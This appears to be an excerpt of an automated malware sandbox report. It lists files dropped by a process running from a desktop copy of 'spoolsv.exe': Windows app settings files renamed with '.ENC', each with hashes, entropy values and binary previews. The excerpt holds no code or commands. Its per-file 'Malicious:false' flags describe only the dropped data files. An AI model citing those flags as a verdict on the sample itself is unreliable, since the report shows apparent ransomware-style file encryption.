                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.980160719555551
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:DOtI5XXOc178DgThF5S/lqLwugRbOcJscLKVtsP:6tIV+sbTAlKwugRbk+KS
                                                                                                                                                                                                                                                      MD5:92BB4ECFF3F9BB80482AAA4831329620
                                                                                                                                                                                                                                                      SHA1:F5023A4E6B845432355071BEBB1B6287A38A97CA
                                                                                                                                                                                                                                                      SHA-256:F3460E8B01823AFA728D6C3F81BEAE810473EFF4572C77631C37130895D3B95A
                                                                                                                                                                                                                                                      SHA-512:4052EABE8799F9F8CAE63A0ECE30B2269C66985D892D042AACDCAF7C21018F06EB5C526A1AD68CC1AAF1BDFB0882373812F60538A6F1A76EEC31D77F7A21024C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:^DA...6.w$.e1...+.;...N.....w.n.....N...!P.c(...J.A.g..Y.X.E.(J...H&..A.........|...`.E.fR..w.-.V>s_.?.yB.6....E.F....4.O.?...\.-.bQk..3fB8.oq...b...~...b..f...S[.#..t..NE.....%I.......G."6.p.!...(.E...g.N.zU.....w.5..A.E...S.S...*...#i.Y...."kE...JI.,.U...+..V9........6...z.z.(6..i....j..T...;..v{S{.^".i.$^...j..V%wQ..y.8.....Q.-..V.}O.3|........c....x.J......[....U.7c@.P.....'.....4..6.......q.$mI.Z.6..K.1..M....K.j...r_..+.NF....y...n~U'I..E.P..I.Ao..JF....>..f>..f..p.K.:w....j...}...9=4uu..Y.y>.W.R.,*...M>S_+o...S.n'..e.O..ZX../J.l..ysT^J....vg.....1...].[.....@X..............V....E..O.Fx..q%.B...P.9j..[.i.....)...S.~.{G.Vx~...^v.Y...[.(.:..lF...a$O..l.O..nC..Jj.4...{g.O...)..;^.DW.......z...]l.R...e..f....P..(......=.Q..c.:f...:..N.n#.g...s...t....r}....^..j..d4..........:9<R.......a..{..*..d?.KU....{.'....jg~.]{K./a=........z...Y..g.5.d.,$..g...S.......5.....g...k.b...+..x:..p+.K.w.1=..i.w..x.U../P.$a....X.P ..w_...I.=..`..r?.....X..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.LOG1.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.977513058905915
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:HcbWPeFGhHbU73cvivuGMkQ98SnGS6H4Z9bVoIZGPL1Z:86Peuoov4UkQpnG3EmX1Z
                                                                                                                                                                                                                                                      MD5:EEBC2467443A534B04882B48D6DB0F10
                                                                                                                                                                                                                                                      SHA1:A9DD2D1C1A0916B87E0F0E882BA7E3C86016DB66
                                                                                                                                                                                                                                                      SHA-256:B9B7DD51CEEB8B92D36EAF7DA0EA8E66E4D123927263B0B7B2490B7F0C8E6CE6
                                                                                                                                                                                                                                                      SHA-512:3D01B6C3BC0F28558E714BBB7E26231E0EECCBCF28252FEFD074341EFAA63DF949196D81B914ACFEB82B5E014E4400A1D4C001DAAA6C2E9AAE713F176BEC1DF6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......J.).....cv0(Hu.....Z(&3.,...Zo....y4...2.D...p....\...;vS.zx..g.gkL.~v.s# kt.=........{........&R.az.....51.G!....E....|Lo.g...J./ ...[.....+....i..6e.{.7_.%..o..(L...x...Y)....~.....O..-.>.....~......[a...I2.Z_gn...9/2.U...L"...Gy...cH...Ou.s.4..d.}.U.J...p........7.[4.....g..........U..V...c..|.j..Z..c"..<.H.T.....%..#.B4......}. R|.T.....j.j.}.1.J.u.-U..e....}..:..m.R....8.}.8........(,.a~ZW.>m._......f.7....D...sr5...5..l}..i(_X...V..b.}C.Q|.1.+...PNq.~..[.a..~.M.?........u#..9..=.8.M....R:..FG].S..$....(a...P.!G.x<!F......j.%..].V.t._6P.../..........|_M<F}|.-{>......0.......G.* x.....^....N..te.l...c.}.a....y .g.U..d(...m..u)..d..>X.t....m\;.Kh.)l.JGO.!a....VR..a..BRh..[..&.l.W.M...>c..f.L..u.92....u.lY.%`.....7..M.+.......8..|.$.j.`...9...1 .....rn....2N.]..............,{.C....!.j.u......E.Y.!o....2O.....u....ot..7>......".tow......W.E..^.a~.........H............k>co.x.\....a\H...".P..(...R..z@...L=&v+...iCE

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.LOG2.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.YourPhone_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.YourPhone_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
